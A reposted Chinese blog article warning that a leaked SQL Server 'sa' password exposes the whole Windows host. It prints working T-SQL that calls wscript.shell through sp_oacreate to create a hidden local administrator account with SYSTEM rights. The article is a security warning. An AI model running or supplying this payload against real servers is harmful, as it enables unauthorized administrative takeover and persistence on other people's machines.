首页 > 数据库 > SQL Server > 正文

SQL Server的安全隐患:不要以为黑掉的只是SQL SERVER而已。

2024-08-31 00:48:29
字体:
来源:转载
供稿:网友

sql server存在着非常严重的安全隐患。sa的密码就像administrator的密码一样重要。

假如别人获得了数据库超级用户sa的密码,那么他/她可以在查询分析器里使用下面的sql语句轻易在win2000(sql server所在的server)上创建一个超级用户:

declare @object int
--创建wscript.shell
exec sp_oacreate 'wscript.shell',@object out
--运行net user iamhacker opendoor /add
--添加一个名字为iamhacker,密码为opendoor的用户
exec sp_oamethod @object,'run',null,'net user iamhacker opendoor /add'
--把iamhacker添加到administrators组中
exec sp_oamethod @object,'run',null,'net localgroup administrators iamhacker /add'
--把iamhacker从user组中删除
exec sp_oamethod @object,'run',null,'net localgroup users iamhacker /del'

我已经尝试过了。。实在太恐怖了。

上面的语句很短。核心是能够调用平台命令 net 。

其实现方法是sql server调用com automation的强大功能。再配合wsh中的一个对象wscript.shell的一个方法:run。(注意,一般sql server都是配置在system的权限下运行的。也就是说,run所调用的程序也是具有system的权限。)

(相关的实验是,调用一下notepad,那么任务管理器下将有用户为system的notepad。exe进程存在)

wscript.shell的隐患其实已经在各个方面很显著了。想不到现在竟然在sql server上也有相关的问题。

所以。大家一定要注意保管好sa的密码。不要随便被人黑了哦。。。

 

 

商业源码热门下载www.html.org.cn

发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表